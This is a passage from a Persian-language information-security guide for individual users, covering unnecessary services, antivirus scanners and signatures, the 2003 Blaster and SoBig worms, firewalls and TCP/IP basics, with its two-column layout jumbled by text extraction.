) ،١٠٤(FTP Serversﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻓﺮﺍﺧـﻮﺍﻧﻲ ﺗـﺎﺑﻊ ﺍﺯ ﺭﺍﻩ
ﺩﻭﺭ ) ١٠٥(RPC Serversﻭ ﻏﻴﺮﻩ ﻣﻲﺑﺎﺷﻨﺪ.
ﺧﺪﻣﺎﺕ ﻓﻌﺎﻝ ﻏﻴﺮﺿﺮﻭﺭﻱ
ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ ﺑـﺴﻴﺎﺭ ﻗﺪﺭﺗﻤﻨـﺪ ﻭ ﻛـﺎﺭﺁ
ﻫﺴﺘﻨﺪ .ﺩﺭ ﺑﻴﺸﺘﺮ ﻣﻮﺍﺭﺩ ﻛﺎﺭﺑﺮ ﻋﺎﺩﻱ ﺗﻤﺎﻡ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﻣﻮﺟـﻮﺩ ﺩﺭ
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺭﺍ ﻻﺯﻡ ﻧﺪﺍﺭﺩ .ﺧﺪﻣﺎﺗﻲ ﻛﻪ ﻣـﻮﺭﺩ ﻧﻴـﺎﺯ ﻧﻴـﺴﺘﻨﺪ ﺑﺎﻳـﺪ
ﻏﻴﺮﻓﻌﺎﻝ ﺷﻮﻧﺪ .ﻣﺘﺄﺳﻔﺎﻧﻪ ﺑﻌﻀﻲ ﺍﺯ ﻋﺮﺿـﻪﻛﻨﻨـﺪﮔﺎﻥ ﻧـﺮﻡﺍﻓـﺰﺍﺭ
ﺗﻤﺎﻣﻲ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﻓﻌﺎﻝ ﻣﻲﻛﻨﻨﺪ ﻭ ﺑﺴﺘﮕﻲ ﺑﻪ
ﻛﺎﺭﺑﺮ ﺩﺍﺭﺩ ﻛﻪ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ ﻳﺎ ﻧﻜﻨـﺪ ،ﻭ ﺩﺭ ﻏﺎﻟـﺐ ﻣـﻮﺍﺭﺩ
104 File Transfer Protocol Servers
105 Remote Procedure Call Servers
ﺑﺨﺶ ﺩﻭﻡ
•
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﻧﺴﺒﺖ ﺑﻪ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺭﺍﺣـﺖﺗـﺮ ﻭ
ﺳﺮﻳﻌﺘﺮ ﺍﺳﺖ ﻭ ﺗﻘﺮﻳﺒﹰﺎ ﻫﻴﭻ ﺗﺄﺧﻴﺮﻱ ﻧﺪﺍﺭﺩ .ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ
ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﮔﻔﺘﮕﻮﻫﺎﻱ ﺍﻧﺠﺎﻡﺷﺪﻩ ﺩﺭ ﺁﻥ ﻋﻤﻠﻲﺗـﺮ ﺍﺯ
ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺎﺷﻨﺪ.
ﻫﻢ ﻛﺎﺭﺑﺮ ﺍﺯ ﻭﺟﻮﺩ ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﺁﮔﺎﻩ ﻧﻴﺴﺖ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺑـﺮﺍﻱ
ﭼﻨﺪﻳﻦ ﺳﺎﻝ ﻣﺘﻮﺍﻟﻲ ﺑﻌـﻀﻲ ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎﻱ UNIXﺑﮕﻮﻧـﻪﺍﻱ
ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺑﻮﺩﻧﺪ ﻛﻪ ﻫﺮ ﺩﺳﺘﮕﺎﻩ ﻣﺠﻬﺰ ﺑﻪ ﺁﻧﻬﺎ ﺑﺘﻮﺍﻧﺪ ﺑﻌﻨـﻮﺍﻥ
ﻳﻚ ﻣﺮﻛﺰ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻏﻴﺮ ﻣﺤﺪﻭﺩ ﻋﻤﻞ ﻧﻤﺎﻳﺪ )ﺍﻟﺒﺘـﻪ ﺍﮔـﺮ
ﺍﻳــﻦ ﻗﺎﺑﻠﻴــﺖ ﺗﻮﺳــﻂ ﻛــﺎﺭﺑﺮ ﻏﻴﺮﻓﻌــﺎﻝ ﻧﻤــﻲﺷــﺪ( .ﺍﻳــﻦ ﻣــﺴﺌﻠﻪ ﺑــﻪ
ﻫﺮﺯﻧﺎﻣﻪﻧﻮﻳﺲﻫﺎ ﺍﻣﻜﺎﻥ ﺩﺍﺩ ﻛﻪ ﺍﺯ ﺍﻳﻦ ﺩﺳﺘﮕﺎﻫﻬﺎ ﺑـﺮﺍﻱ ﺗﻮﺯﻳـﻊ
ﻫﺮﺯﻧﺎﻣﻪﻫﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻨـﺪ ،ﺑـﺪﻭﻥ ﺁﻧﻜـﻪ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺻـﺎﺣﺒﺎﻥ
ﺩﺳﺘﮕﺎﻫﻬﺎ ﺍﺯ ﻭﺟﻮﺩ ﭼﻨﻴﻦ ﻗﺎﺑﻠﻴﺘﻲ ﺁﮔﺎﻫﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ.
٩٣
ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
ﻭﻳﺮﻭﺱﻳﺎﺑﻬﺎ ﺑﻪ ﺭﻭﺷﻬﺎﻱ ﺯﻳﺮ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺭﺍ ﺍﺯ ﻭﻳﺮﻭﺳﻬﺎ ،ﻛﺮﻣﻬـﺎ
ﻭ ﺗﺮﺍﻭﺍﻫﺎﻱ ﺷﻨﺎﺧﺘﻪﺷﺪﻩ ﺍﻳﻤﻦ ﻣﻲﺳﺎﺯﻧﺪ:
ﻓﺼﻞ ﻫﻔﺘﻢ
ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ
•
ﻫﺮﮔﺎﻩ ﻳﻚ ﺩﻳﺴﻚ ﺧﺎﺭﺟﻲ ﻭﺍﺭﺩ ﺩﺳﺘﮕﺎﻩ ﺧﻮﺩ ﻛﻨﻴﺪ ﺁﻧـﺮﺍ
ﺑﺮﺍﻱ ﻳﺎﻓﺘﻦ ﻭﻳﺮﻭﺳﻬﺎﻱ ﺍﺣﺘﻤﺎﻟﻲ ﺑﺮﺭﺳﻲ ﻣﻲﻧﻤﺎﻳﻨﺪ.
ﻛﻠﻴﺎﺕ
•
ﻫﺮ ﺯﻣﺎﻥ ﻛﻪ ﻳﻚ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭﻳﺎﻓﺖ ﺷـﻮﺩ ،ﺧـﻮﺩ
ﻧﺎﻣﻪ ﻭ ﺿﻤﺎﺋﻢ ﺁﻥ ﺑﺮﺍﻱ ﻋﺎﺭﻱ ﺑﻮﺩﻥ ﺍﺯ ﻫﺮ ﻧﻮﻉ ﻭﻳـﺮﻭﺱ
ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ.
•
ﻫﺮﮔﺎﻩ ﻓـﺎﻳﻠﻲ ﺍﺯ ﻳـﻚ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ downloadﺷـﻮﺩ
ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ.
•
ﺩﺭ ﺑﻴﺸﺘﺮ ﻣﻮﺍﺭﺩ ﺯﻣﺎﻧﻴﻜﻪ ﻳﻚ ﺻﻔﺤﺔ ﻭﺏ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ
ﺟﺎﺳﺎﺯﻱ ﺷﺪﻩ ﺩﺭ ﺁﻥ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ downloadﺷـﻮﺩ
ﺑﺮﺭﺳﻲ ﻣﻲﮔﺮﺩﺩ.
•
ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳـﻦ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﻳـﻚ ﻓﺎﻳـﻞ،
ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﻓﺎﻳﻠﻬﺎ ﻭ ﻳﺎ ﺗﻤﺎﻣﻲ ﺩﻳـﺴﻜﻬﺎﻱ ﻣﻮﺟـﻮﺩ ﺭﺍ
ﺑﺮﺍﻱ ﻭﻳﺮﻭﺱ ﺑﺮﺭﺳﻲ ﻧﻤﺎﻳﻴﺪ.
•
ﺍﮔﺮ ﻳﻚ ﻭﻳﺮﻭﺱ ،ﻛﺮﻡ ،ﻳﺎ ﺗﺮﺍﻭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﺷﻮﺩ ،ﺍﻳﻦ ﺍﺑﺰﺍﺭ
ﺁﻧﺮﺍ ﺍﺯ ﺑﻴﻦ ﻣﻲﺑﺮﺩ ﻳﺎ ﺍﮔﺮ ﻧﺘﻮﺍﻧﺪ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫـﺪ ﺑـﻪ
ﺷﻤﺎ ﺍﻃﻼﻉ ﻣﻲﺩﻫﺪ ﻛﻪ ﺍﻳﻦ ﻣﺸﻜﻞ ﻗﺎﺑﻞ ﺭﻓﻊ ﻧﻴـﺴﺖ؛ ﻭ
ﺩﺭﻧﺘﻴﺠﻪ ﻓﺎﻳﻞ ﺧﺮﺍﺏ ﺭﺍ ﻗﺮﻧﻄﻴﻨﻪ ﻣﻲﻛﻨﺪ ﻭ ﺑﺪﻳﻨﻮﺳـﻴﻠﻪ ﺍﺯ
ﺁﺳﻴﺐ ﺩﻳﺪﻥ ﺳﺎﻳﺮ ﻗﺴﻤﺘﻬﺎﻱ ﺳﻴـﺴﺘﻢ ﻓﺎﻳـﻞ ﺟﻠـﻮﮔﻴﺮﻱ
ﻣﻲﻧﻤﺎﻳﺪ.
ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺍﻣﻨﻴﺘﻲ ﻭ ﺭﻭﺷﻬﺎﻱ ﺍﻓـﺰﺍﻳﺶ
ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪﻫﺎ ﻭ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ .ﻣﻨﻈﻮﺭ ﺍﺯ
ﺑﺴﺘﻪ ﻫﺎﻱ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻱ ﺍﻣﻨﻴﺘﻲ ﻫﻤﺎﻥ ﻭﻳﺮﻭﺱ ﻳﺎﺑﻬﺎ ،ﺩﻳـﻮﺍﺭﻩﻫـﺎﻱ
ﺁﺗﺶ ،ﻭ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺍﺳﺖ.
ﻭﻳﺮﻭﺱﻳﺎﺏ
ﻗﺎﻧﻮﻥ ﺑﻴﺴﺘﻢ:
ﺭﻭﻱ ﻫﺮ ﺭﺍﻳﺎﻧﺔ ﺁﺳﻴﺐﭘﺬﻳﺮ ﻧﺴﺒﺖ ﺑﻪ ﻭﻳـﺮﻭﺱ ﺑﺎﻳـﺪ
ﻧــﺮﻡﺍﻓــﺰﺍﺭ ﺿــﺪﻭﻳﺮﻭﺱ ﻧــﺼﺐ ﺷــﻮﺩ ﻭ ﻫــﺮ ﺭﻭﺯ
ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ ﮔﺮﺩﺩ .ﻫﻤﭽﻨﻴﻦ ﺩﺳﺘﮕﺎﻩ ﺑﺎﻳﺪ ﺑـﺼﻮﺭﺕ
ﺩﻭﺭﻩﺍﻱ ﺑﺮﺍﻱ ﻳﺎﻓﺘﻦ ﻭﻳﺮﻭﺱ ﺟﺴﺘﺠﻮﻱ ﻛﺎﻣﻞ ﺷﻮﺩ.
ﻗﺎﻧﻮﻥ ﺑﻴﺴﺖ ﻭ ﻳﻜﻢ:
ﺩﺭ ﻣﻮﺭﺩ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﻛﻪ ﺗﺤﺖ ﺗﺄﺛﻴﺮ ﻭﻳﺮﻭﺳـﻬﺎ ﻗـﺮﺍﺭ
ﻧﻤﻲﮔﻴﺮﻧـﺪ )ﻣﺎﻧﻨـﺪ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨـﻲ ﺑـﺮ (Unixﺑﺎﻳـﺪ
ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﺷﻮﺩ ﻛﻪ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺍﺭﺳـﺎﻟﻲ
ﺣﺎﻭﻱ ﻭﻳﺮﻭﺱ ﻧﻴﺴﺖ ﺗـﺎ ﺑـﻪ ﮔﻴﺮﻧـﺪﻩ ﻧﻴـﺰ ﺁﺳـﻴﺒﻲ
ﻧﺮﺳﺪ.
ﻗﺎﻧﻮﻥ ﺑﻴﺴﺖ ﻭ ﺩﻭﻡ:
ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻣﻬﻢ ﺧﻮﺩ ﺭﺍ
ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ ﻧﻤﺎﻳﻴﺪ ﻭ ﺑﻪ ﺧﺎﻃﺮ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﻪ
ﻭﻳﺮﻭﺱﻳﺎﺑﻬﺎ ﺗﻨﻬﺎ ﻭﻳﺮﻭﺳﻬﺎﻱ ﻣﻬﺎﺟﻢ ﺑـﻪ ﻓﺎﻳﻠﻬـﺎ ﺭﺍ
ﺑﺮﺭﺳــﻲ ﻣــﻲﻛﻨﻨــﺪ؛ ﺩﺭﺣﺎﻟﻴﻜــﻪ ﺁﺳــﻴﺐﭘــﺬﻳﺮﻱ
ﺳﻴﺴﺘﻢ ﻋﺎﻣﻠﻬﺎ ﻭ ﺑﺮﻧﺎﻣﻪ ﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻣﻤﻜﻦ ﺍﺳـﺖ
ﻣﻮﺟﺐ ﺁﺳﻴﺐ ﺩﻳﺪﻥ ﺳﻴﺴﺘﻢ ﺍﺯ ﺍﺑﻌﺎﺩ ﺩﻳﮕﺮ ﺷﻮﻧﺪ.
ﻭﺟــﻮﺩ ﻳــﻚ ﻭﻳــﺮﻭﺱﻳــﺎﺏ ﺣــﺎﻭﻱ ﻧــﺸﺎﻧﻬﺎﻱ ﻭﻳــﺮﻭﺱ
١٠٦
ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺷﺪﻩ )"ﻧﺸﺎﻥ" ﻣﺸﺨﺼﺔ ﺧﺎﺻﻲ ﺍﺯ ﻳﻚ ﻭﻳـﺮﻭﺱ ﺍﺳـﺖ ﻛـﻪ
ﻭﻳﺮﻭﺱﻳﺎﺏ ﺗﻮﺳﻂ ﺁﻥ ﻣﻲﺗﻮﺍﻧﺪ ﻧﻮﻉ ﻭﻳﺮﻭﺱ ﺭﺍ ﺗﺸﺨﻴﺺ ﺩﻫـﺪ( ،ﻳﻜـﻲ ﺍﺯ
ﻣﻬﻤﺘﺮﻳﻦ ﻗﺴﻤﺘﻬﺎﻳﻲ ﺍﺯ ﻳﻚ ﺷـﺒﻜﻪ ﺍﺳـﺖ ﻛـﻪ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑـﻪ
ﺍﻳﻨﺘﺮﻧــﺖ ﻣﺘــﺼﻞ ﺑﺎﺷــﺪ .ﺗﻮﺟــﻪ ﺩﺍﺷــﺘﻪ ﺑﺎﺷــﻴﺪ ﻛــﻪ ﺑﺘــﺎﺯﮔﻲ
ﻭﻳﺮﻭﺳﻬﺎﻳﻲ ﺑﺮﺍﻱ ﻣﺤﻴﻂ UNIXﺩﺭﺣﺎﻝ ﮔﺴﺘﺮﺵ ﻫﺴﺘﻨﺪ ،ﺍﻣـﺎ
ﻛﺮﻣﻬﺎ ﻭ ﺗﺮﺍﻭﺍﻫﺎ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﺤﻴﻂ ﺍﺯ ﻗﺒﻞ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪﺍﻧﺪ.
ﺗﺎ ﺍﻭﺍﺧﺮ ﺁﮔﻮﺳﺖ ۲۰۰۳ﻳﻜـﻲ ﺍﺯ ﺿﺪﻭﻳﺮﻭﺳـﻬﺎﻱ ﺩﺳـﺘﮕﺎﻫﻬﺎﻱ
ﺷﺨــــﺼﻲ ﻭ ) Macintoshﺿــــﺪﻭﻳﺮﻭﺱ (Nortonﺗﻘﺮﻳﺒــــﹰﺎ
106 Virus Signatures
ﺑﺨﺶ ﺩﻭﻡ
•
ﻫﺮ ﺯﻣﺎﻥ ﻛﻪ ﺑﻪ ﻓﺎﻳﻠﻲ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﻳـﺎ ﺁﻧـﺮﺍ
ﻛﭙﻲ ،ﺫﺧﻴﺮﻩ ،ﻣﻨﺘﻘﻞ ،ﺑﺎﺯ ﻳﺎ ﺑﺴﺘﻪ ﻧﻤﺎﻳﻴﺪ ،ﺟﻠـﻮﻱ ﺁﺳـﻴﺐ
ﺭﺳﺎﻧﺪﻥ ﻭﻳﺮﻭﺳﻬﺎ ﺑﻪ ﺳﻴﺴﺘﻢ ﺭﺍ ﻣﻲﮔﻴﺮﻧﺪ.
٩٤
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﻣﻲﺗﻮﺍﻧﺴﺖ ۶۵۰۰۰ﻭﻳﺮﻭﺱ ﻣﺨﺘﻠﻒ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﺪ .ﺁﮔﻮﺳﺖ
۲۰۰۳ﺍﺯ ﻧﻈﺮ ﺍﻧﺘﺸﺎﺭ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﻣﺨـﺮﺏ ﻣـﺎﻩ ﺟـﺎﻟﺒﻲ ﺑـﻮﺩ،
ﭼﺮﺍﻛﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺮﻣﻬﺎ ﻛﻪ ﺩﺭ ﺁﻥ ﻣﺎﻩ ﻣﻨﺘـﺸﺮ ﺷـﺪﻧﺪ ﺍﺯ ﻳـﻚ
ﺁﺳــﻴﺐﭘــﺬﻳﺮﻱ ﺑــﺴﻴﺎﺭ ﺣﻴــﺎﺗﻲ ﺩﺭ ﺳﻴــﺴﺘﻢﻋﺎﻣــﻞ Windows
ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﻣﻲﻛﺮﺩﻧﺪ ) Blasterﻭ SoBigﺍﺯ ﺭﺍﻳﺠﺘﺮﻳﻦ ﺁﻧﻬﺎ ﺑﻮﺩﻧـﺪ(.
ﻳﻜﻤﺎﻩ ﭘﻴﺸﺘﺮ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺑﺮﺍﻱ ﺁﻥ ﻭﺻﻠﻪﺍﻱ ﻣﻨﺘﺸﺮ ﻛﺮﺩﻩ ﺑﻮﺩ،
ﺍﻣﺎ ﺍﻓﺮﺍﺩ ﻛﻤﻲ ﺁﻧﺮﺍ ﻧﺼﺐ ﻛﺮﺩﻩ ﺑﻮﺩﻧﺪ ﻭ ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﻛﺮﻣﻬﺎﻱ
ﺟﺪﻳﺪ ﺗﻮﺍﻧـﺴﺘﻨﺪ ﺑـﻪ ﺩﺳـﺘﮕﺎﻫﻬﺎﻱ ﺯﻳـﺎﺩﻱ ﺁﺳـﻴﺐ ﺑﺰﻧﻨـﺪ ﻭ ﺑـﻪ
ﺳﺮﻋﺖ ﺩﺭ ﺁﻧﻬﺎ ﭘﺨﺶ ﺷﻮﻧﺪ؛ ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﺷﺎﻳﺪ ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ
ﺭﻛﻮﺭﺩﻫﺎﻱ ﺟﺪﻳﺪﻱ ﺑﻪ ﺛﺒﺖ ﺭﺳﻴﺪﻩ ﺑﺎﺷﺪ .ﺩﺭ ﺷﻠﻮﻏﺘﺮﻳﻦ ﺭﻭﺯ ﺁﻥ
ﻣﺎﻩ ،ﻭﻳﺮﻭﺱﻳﺎﺏ Nortonﺣﺪﻭﺩ ۵۰ﻧﺸﺎﻥ ﺟﺪﻳـﺪ ﻭﻳـﺮﻭﺱ ﺭﺍ
ﺑﻪ ﻓﻬﺮﺳﺖ ﻭﻳﺮﻭﺳﻬﺎﻱ ﻗﺎﺑﻞ ﺷﻨﺎﺳﺎﻳﻲ ﺧﻮﺩ ﺍﺿﺎﻓﻪ ﻧﻤـﻮﺩ .ﺍﻳـﻦ
ﻋﺪﺩ ﺗﺎ ﻳﻜﻤﺎﻩ ﺑﻌﺪ ﺍﺯ ﺁﻥ ﺑﻪ ﺣﺪﻭﺩ ۵۲۰ﺭﺳﻴﺪ.
ﭘﻴﺎﻣﻬﺎﻱ ﺍﺭﺳﺎﻟﻲ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﻛﻨﺘﺮﻝ ﻣﻲﻛﻨـﺪ -ﺭﺍ ﻧﻴـﺰ
ﺩﺭﻳﺎﺑﻴﺪ .ﺍﮔﺮ ﺑﺎ ﭘﺮﻭﺗﻜﻞ TCP/IPﺁﺷﻨﺎ ﻫـﺴﺘﻴﺪ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺑـﻪ
ﻓﺼﻞ ﺑﻌﺪﻱ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ ﺍﻣﺎ ﺍﮔﺮ ﺁﻧﺮﺍ ﻧﻤﻲﺷﻨﺎﺳﻴﺪ ﺍﺑﺘﺪﺍ ﺿﻤﻴﻤﺔ
۲ﻫﻤﻴﻦ ﺑﺨﺶ ﺭﺍ ﻣﻄﺎﻟﻌﻪ ﻧﻤﺎﻳﻴـﺪ .ﺗﻮﺟـﻪ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﺣﺘـﻲ
ﺩﺭﺻــﻮﺭﺗﻴﻜﻪ ﻧﺨﻮﺍﻫﻴــﺪ ﺍﻳــﻦ ﺟﺰﺋﻴــﺎﺕ ﺭﺍ ﺑﻴﺎﻣﻮﺯﻳــﺪ ﻫﻤﭽﻨــﺎﻥ
ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ .ﺩﺭ ﺍﺩﺍﻣﻪ ﺗﻤـﺎﻣﻲ ﺁﻧﭽـﻪ
ﻛﻪ ﻻﺯﻡ ﺍﺳﺖ ﺑﺼﻮﺭﺕ ﺧﻼﺻﻪ ﺩﺭ ﻣﻮﺭﺩ TCP/IPﺑﺪﺍﻧﻴﺪ ﺫﻛـﺮ
ﻣﻲﺷﻮﺩ:
•
ﺩﺳﺘﮕﺎﻫﻬﺎﻳﻲ ﻛﻪ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ ﻫﺴﺘﻨﺪ ﺩﺍﺭﺍﻱ ﻳـﻚ
ﺁﺩﺭﺱ IPﺑﻪ ﺷﻜﻞ 12.222.103.43ﻣﻲ ﺑﺎﺷﻨﺪ ﻛـﻪ
ﻫﻤﺎﻧﮕﻮﻧﻪ ﻛﻪ ﻣﻲﺑﻴﻨﻴـﺪ ﻣﺘـﺸﻜﻞ ﺍﺯ ﭼﻬـﺎﺭ ﻋـﺪﺩ ﻣﺠـﺰﺍ
ﺍﺳﺖ .ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﺍﻱ ﭘﻴﺪﺍ ﻛﺮﺩﻥ ﻣﺴﻴﺮ ﭘﻴﺎﻡ ﺍﺯ ﺍﻳﻦ ﺁﺩﺭﺱ
ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ﻭ ﻫﺮ ﺭﺍﻳﺎﻧـﻪ ﺑـﺎ ﺍﺭﺍﺋـﻪ ﺁﺩﺭﺱ ﻣﻘـﺼﺪ ﺩﺭ
ﭼﻨﻴﻦ ﻗﺎﻟﺒﻲ ﻣﺸﺨﺺ ﻣﻲﻛﻨﺪ ﻛﻪ ﺍﻳـﻦ ﭘﻴﺎﻣﻬـﺎ ﺑﺎﻳـﺪ ﺑـﻪ
ﻛﺠﺎ ﺍﺭﺳﺎﻝ ﺷﻮﻧﺪ.
•
ﺩﺭ ﻫﺮ ﺩﺳـﺘﮕﺎﻩ ﺑﺮﻧﺎﻣـﻪ ﻫـﺎﻱ ﻣﺨﺘﻠـﻒ ﺑﻮﺳـﻴﻠﻪ ﺷـﻤﺎﺭﺓ
١٠٩
ﭘﻮﺭﺕ ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲﺷﻮﻧﺪ )ﻣﺎﻧﻨﺪ ﺷـﻤﺎﺭﻩ ﺗﻠﻔﻨﻬـﺎﻱ ﺩﺍﺧﻠـﻲ
ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ
ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺗﻤﺎﻣﻲ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺩﺍﺧﻞ ﻳﺎ ﺧـﺎﺭﺝ ﺍﺯ ﺷـﺒﻜﻪ ﺭﺍ
ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ ﻭ ﺑﺮ ﺍﺳﺎﺱ ﻣﺠﻤﻮﻋﻪ ﻗﻮﺍﻧﻴﻦ ﻣﻮﺟﻮﺩ ﺩﺭ ﺧﻮﺩ ﺑـﻪ
ﺗﺮﺍﻓﻴﻚ ١٠٧ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﺪ ﻛﻪ ﺍﺯ ﺷﺒﻜﻪ ﻋﺒﻮﺭ ﻛﻨﺪ ﻳﺎ ﺁﻧﺮﺍ ﻣﺘﻮﻗـﻒ
ﻣﻲﺳﺎﺯﺩ .ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺷﻜﻞ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪ
ﻧﺼﺐ ﺷﻮﺩ ﻳﺎ ﻗﺴﻤﺘﻲ ﺍﺯ ﺗﺠﻬﻴـﺰﺍﺕ ﻣﻴـﺎﻥ ﺭﺍﻳﺎﻧـﻪ )ﻳـﺎ ﮔﺮﻭﻫـﻲ ﺍﺯ
ﻱ ﺁﻥ ﺑﺎﺷﺪ .ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺩﻳﻮﺍﺭﺓ ﺁﺗـﺶ
ﺭﺍﻳﺎﻧﻪﻫﺎ( ﻭ ﺍﺭﺗﺒﺎﻁ ﺷﺒﻜﻪﺍ ﹺ
١٠٨
ﺩﺭ ﺑﻌــﻀﻲ ﺗﺠﻬﻴــﺰﺍﺕ ﺩﻳﮕــﺮ ﻣﺎﻧﻨــﺪ ﻣــﺴﻴﺮﻳﺎﺑﻬﺎ ﻗــﺮﺍﺭ ﺩﺍﺩﻩ
ﻻ ﺭﺍﻳﮕــﺎﻥ ﻭ
ﻣــﻲﺷــﻮﺩ .ﺍﻳــﻦ ﻧــﻮﻉ ﺩﻳــﻮﺍﺭﻩﻫــﺎﻱ ﺁﺗــﺶ ﻣﻌﻤــﻮ ﹰ
ﺍﺯ ﭘﻴﺶ ﻧﺼﺐﺷﺪﻩ ﻫﺴﺘﻨﺪ ﻭ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﻭﺟﻮﺩ
ﺩﺍﺭﻧﺪ.
ﻗﺎﻧﻮﻥ ﺑﻴﺴﺖ ﻭ ﺳﻮﻡ:
